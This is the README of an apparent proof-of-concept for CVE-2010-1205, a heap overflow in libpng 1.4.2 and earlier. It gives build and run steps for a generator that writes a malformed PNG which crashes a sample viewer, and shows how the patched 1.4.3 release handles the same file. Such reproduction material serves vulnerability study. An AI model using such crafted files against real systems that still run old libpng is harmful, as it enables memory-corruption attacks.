Sample exploit using CVE-2010-1205 vulnerability in libpng (<=1.4.2)

gregbook - set of sample programs distributed with libpng sources

generate - generates malicious png file which triggers heap-overflow while reading the file with libpng


steps to reproduce:
./build.sh                  # build all libraries and executables. gregbook/rpng2-x is linked against libpng-1.4.2 (buggy)
./generate/build/generate   # generates xploit.png - malformed png file
cd gregbook/
./rpng2-x ../xploit.png     # run explaple which shows how to use libpng to display png file. Ends with Segmentation fault.


steps to run with fixed libpng version (1.4.3):
in gregbook/Makefile edit line 33:
PNGDIR = ../libpng-1.4.3
in gregbook directory run:
make clean && make
./rpng2-x ../xploit.png     # opens window with the png file